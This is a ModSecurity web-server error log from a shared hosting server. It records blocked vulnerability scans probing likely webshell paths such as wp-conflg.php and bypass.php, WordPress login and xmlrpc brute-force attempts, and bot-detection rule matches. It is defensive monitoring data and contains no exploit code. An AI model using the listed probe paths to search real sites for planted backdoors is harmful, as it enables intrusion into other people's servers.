[Tue May 26 18:04:16.496466 2026] [security2:error] [pid 960743:tid 960925] [client 185.192.70.75:38227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/images/smilies/about.php"] [unique_id "ahWTSPQvEln_BHBy2zJvVAAAALk"]
[Tue May 26 18:04:16.808713 2026] [security2:error] [pid 960743:tid 960969] [client 136.243.228.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTSPQvEln_BHBy2zJvXwAAAOU"]
[Tue May 26 18:04:17.234277 2026] [security2:error] [pid 960743:tid 960959] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTSPQvEln_BHBy2zJvYAAAANs"]
[Tue May 26 18:04:17.889281 2026] [security2:error] [pid 960743:tid 960977] [client 185.192.70.85:39421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/js/crop/admin.php"] [unique_id "ahWTSfQvEln_BHBy2zJvgQAAAO0"]
[Tue May 26 18:04:18.254687 2026] [security2:error] [pid 960743:tid 960924] [client 17.22.237.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWTSfQvEln_BHBy2zJvfAAAALg"]
[Tue May 26 18:04:18.588394 2026] [core:crit] [pid 960743:tid 960974] (13)Permission denied: [client 51.77.74.125:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:04:18.649486 2026] [security2:error] [pid 960743:tid 960968] [client 143.44.193.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWTSvQvEln_BHBy2zJvkQAAAOQ"], referer: https://earthone.me/
[Tue May 26 18:04:18.793703 2026] [security2:error] [pid 960743:tid 960894] [client 82.76.238.33:61947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTSvQvEln_BHBy2zJvmgAAAJo"]
[Tue May 26 18:04:18.868763 2026] [security2:error] [pid 960743:tid 960978] [client 185.192.70.70:63399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/PHPMailer/wp-conflg.php"] [unique_id "ahWTSvQvEln_BHBy2zJvngAAAO4"]
[Tue May 26 18:04:19.415950 2026] [security2:error] [pid 960743:tid 960894] [client 82.76.238.33:61947] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTSvQvEln_BHBy2zJvmgAAAJo"]
[Tue May 26 18:04:19.572290 2026] [security2:error] [pid 960743:tid 960909] [client 14.160.197.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTS_QvEln_BHBy2zJvpAAAAKk"]
[Tue May 26 18:04:19.833879 2026] [security2:error] [pid 960743:tid 960876] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTS_QvEln_BHBy2zJvqgAAAIg"]
[Tue May 26 18:04:19.950777 2026] [security2:error] [pid 960743:tid 960957] [client 185.192.70.93:57411] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/PHPMailer/admin.php"] [unique_id "ahWTS_QvEln_BHBy2zJvuQAAANk"]
[Tue May 26 18:04:20.089988 2026] [security2:error] [pid 960743:tid 960982] [client 17.22.237.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWTTPQvEln_BHBy2zJvvwAAAPI"]
[Tue May 26 18:04:20.279233 2026] [security2:error] [pid 960743:tid 960977] [client 172.104.210.105:58305] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.85"] [uri "/index.cgi"] [unique_id "ahWTTPQvEln_BHBy2zJvwwAAAO0"]
[Tue May 26 18:04:21.229842 2026] [security2:error] [pid 960743:tid 960958] [client 185.192.70.69:30767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/widgets/wp-login.php"] [unique_id "ahWTTPQvEln_BHBy2zJv0QAAANo"]
[Tue May 26 18:04:21.828633 2026] [security2:error] [pid 960743:tid 960944] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTTfQvEln_BHBy2zJv2gAAAMw"]
[Tue May 26 18:04:22.219009 2026] [security2:error] [pid 960743:tid 960955] [client 17.22.237.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWTTvQvEln_BHBy2zJv6QAAANc"]
[Tue May 26 18:04:22.841425 2026] [security2:error] [pid 960743:tid 960851] [remote 103.11.102.106:37784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWTTvQvEln_BHBy2zJv9AAA6Ws"]
[Tue May 26 18:04:22.877588 2026] [security2:error] [pid 960743:tid 960854] [remote 160.250.186.220:42434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTTvQvEln_BHBy2zJv_gAAim4"]
[Tue May 26 18:04:23.766417 2026] [security2:error] [pid 960743:tid 960858] [remote 88.198.165.116:42652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTT_QvEln_BHBy2zJwEAAAl3I"]
[Tue May 26 18:04:24.596138 2026] [security2:error] [pid 960743:tid 960970] [client 17.22.237.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWTUPQvEln_BHBy2zJwKwAAAOY"]
[Tue May 26 18:04:24.811419 2026] [security2:error] [pid 960743:tid 960982] [client 13.219.180.99:49026] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWTUPQvEln_BHBy2zJwLAAAAPI"]
[Tue May 26 18:04:24.994525 2026] [security2:error] [pid 960743:tid 960925] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTUPQvEln_BHBy2zJwJgAAALk"]
[Tue May 26 18:04:25.508846 2026] [security2:error] [pid 960743:tid 960942] [client 185.192.70.101:40273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/files/index.php"] [unique_id "ahWTUfQvEln_BHBy2zJwQgAAAMo"]
[Tue May 26 18:04:25.621292 2026] [security2:error] [pid 960743:tid 960968] [client 13.219.180.99:5631] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWTUfQvEln_BHBy2zJwSQAAAOQ"]
[Tue May 26 18:04:25.870502 2026] [security2:error] [pid 960743:tid 960868] [remote 51.91.98.45:54052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWTUfQvEln_BHBy2zJwTgAAoXw"]
[Tue May 26 18:04:25.947750 2026] [security2:error] [pid 960743:tid 960886] [client 13.219.180.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "mail.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTUfQvEln_BHBy2zJwWgAAAJI"]
[Tue May 26 18:04:25.957307 2026] [security2:error] [pid 960743:tid 960988] [client 13.219.180.99:11934] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTUfQvEln_BHBy2zJwUwAA-AE"]
[Tue May 26 18:04:25.966676 2026] [security2:error] [pid 960743:tid 960903] [client 13.219.180.99:44266] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTUfQvEln_BHBy2zJwVgAAowI"]
[Tue May 26 18:04:25.967319 2026] [security2:error] [pid 960743:tid 960894] [client 13.219.180.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTUfQvEln_BHBy2zJwWwAAAJo"]
[Tue May 26 18:04:26.637674 2026] [security2:error] [pid 960743:tid 960945] [client 13.219.180.99:20765] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWTUfQvEln_BHBy2zJwSgAAAM0"]
[Tue May 26 18:04:26.647644 2026] [security2:error] [pid 960743:tid 960909] [client 185.192.70.72:25057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/PHPMailer/options.php"] [unique_id "ahWTUvQvEln_BHBy2zJwcAAAAKk"]
[Tue May 26 18:04:26.976763 2026] [security2:error] [pid 960743:tid 960913] [client 17.22.237.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWTUvQvEln_BHBy2zJwfQAAAK0"]
[Tue May 26 18:04:27.641000 2026] [security2:error] [pid 960743:tid 960931] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTU_QvEln_BHBy2zJwhAAAAL8"]
[Tue May 26 18:04:27.653722 2026] [security2:error] [pid 960743:tid 960960] [client 185.192.70.86:53311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/inc.php"] [unique_id "ahWTU_QvEln_BHBy2zJwmgAAANw"]
[Tue May 26 18:04:28.920042 2026] [security2:error] [pid 960743:tid 960983] [client 185.192.70.96:43331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/index.php"] [unique_id "ahWTVPQvEln_BHBy2zJwugAAAPM"]
[Tue May 26 18:04:29.143707 2026] [security2:error] [pid 960743:tid 960945] [client 82.76.238.33:62434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTVfQvEln_BHBy2zJwwQAAAM0"]
[Tue May 26 18:04:29.143848 2026] [security2:error] [pid 960743:tid 960945] [client 82.76.238.33:62434] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTVfQvEln_BHBy2zJwwQAAAM0"]
[Tue May 26 18:04:29.625444 2026] [security2:error] [pid 960743:tid 960995] [client 104.28.122.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWTVfQvEln_BHBy2zJwzgAAAP8"]
[Tue May 26 18:04:29.704775 2026] [autoindex:error] [pid 960743:tid 960883] [client 43.130.57.76:60138] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:04:30.122398 2026] [security2:error] [pid 960743:tid 960894] [client 185.192.70.100:54513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/filemanager.php"] [unique_id "ahWTVvQvEln_BHBy2zJw7gAAAJo"]
[Tue May 26 18:04:30.313172 2026] [security2:error] [pid 960743:tid 960899] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTVfQvEln_BHBy2zJw4wAAAJ8"]
[Tue May 26 18:04:30.531780 2026] [security2:error] [pid 960743:tid 960969] [client 191.102.157.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTVvQvEln_BHBy2zJw-gAAAOU"]
[Tue May 26 18:04:30.538319 2026] [security2:error] [pid 960743:tid 960949] [client 191.102.157.144:2194] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTVvQvEln_BHBy2zJw9gAA0RY"]
[Tue May 26 18:04:30.614303 2026] [security2:error] [pid 960743:tid 960979] [client 191.102.157.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "mail.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTVvQvEln_BHBy2zJw_wAAAO8"]
[Tue May 26 18:04:30.624891 2026] [security2:error] [pid 960743:tid 960978] [client 191.102.157.144:2192] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTVvQvEln_BHBy2zJw_QAA7jY"]
[Tue May 26 18:04:30.973869 2026] [security2:error] [pid 960743:tid 960983] [client 185.192.70.3:22321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/cgi-bin/bypass.php"] [unique_id "ahWTVvQvEln_BHBy2zJxCQAAAPM"]
[Tue May 26 18:04:32.253998 2026] [security2:error] [pid 960743:tid 960899] [client 74.7.175.186:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "hassina-foundation.com"] [uri "/robots.txt"] [unique_id "ahWTWPQvEln_BHBy2zJxSQAAAJ8"]
[Tue May 26 18:04:32.254699 2026] [security2:error] [pid 960743:tid 960952] [client 74.7.175.186:51994] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "hassina-foundation.com"] [uri "/robots.txt"] [unique_id "ahWTWPQvEln_BHBy2zJxRQAA1CM"]
[Tue May 26 18:04:32.342343 2026] [security2:error] [pid 960743:tid 960965] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTV_QvEln_BHBy2zJxLQAAAOE"]
[Tue May 26 18:04:33.530976 2026] [security2:error] [pid 960743:tid 960927] [client 185.192.70.100:37915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/.well-known/pki-validation/admin.php"] [unique_id "ahWTWfQvEln_BHBy2zJxgQAAALs"]
[Tue May 26 18:04:34.501046 2026] [security2:error] [pid 960743:tid 960891] [client 185.192.70.4:57833] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 4.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/IXR/admin.php"] [unique_id "ahWTWvQvEln_BHBy2zJxnwAAAJc"]
[Tue May 26 18:04:35.586831 2026] [security2:error] [pid 960743:tid 960996] [client 185.192.70.73:52615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahWTW_QvEln_BHBy2zJxxwAAAQA"]
[Tue May 26 18:04:35.797943 2026] [security2:error] [pid 960743:tid 960948] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTW_QvEln_BHBy2zJxtwAAANA"]
[Tue May 26 18:04:36.513913 2026] [security2:error] [pid 960743:tid 960944] [client 185.192.70.73:61977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/js/jquery/jquery.php"] [unique_id "ahWTXPQvEln_BHBy2zJx6wAAAMw"]
[Tue May 26 18:04:37.963120 2026] [security2:error] [pid 960743:tid 960926] [client 185.192.70.74:49519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/function.php"] [unique_id "ahWTXfQvEln_BHBy2zJyGAAAALo"]
[Tue May 26 18:04:38.020769 2026] [security2:error] [pid 960743:tid 960884] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTXfQvEln_BHBy2zJyDQAAAJA"]
[Tue May 26 18:04:38.917877 2026] [security2:error] [pid 960743:tid 960936] [client 185.192.70.74:55943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/block-supports/autoload_classmap.php"] [unique_id "ahWTXvQvEln_BHBy2zJyNAAAAMQ"]
[Tue May 26 18:04:39.492697 2026] [security2:error] [pid 960743:tid 960778] [remote 47.128.46.9:23262] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/fr/programs-and-campaigns/cross-cutting-programs"] [unique_id "ahWTX_QvEln_BHBy2zJyTgAAlSI"]
[Tue May 26 18:04:39.629493 2026] [security2:error] [pid 960743:tid 960892] [client 82.76.238.33:62892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTX_QvEln_BHBy2zJyTQAAAJg"]
[Tue May 26 18:04:39.629649 2026] [security2:error] [pid 960743:tid 960892] [client 82.76.238.33:62892] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTX_QvEln_BHBy2zJyTQAAAJg"]
[Tue May 26 18:04:40.049178 2026] [security2:error] [pid 960743:tid 960915] [client 185.192.70.76:24879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-signup.php"] [unique_id "ahWTX_QvEln_BHBy2zJyXwAAAK8"]
[Tue May 26 18:04:40.685552 2026] [security2:error] [pid 960743:tid 960903] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTYPQvEln_BHBy2zJycQAAAKM"]
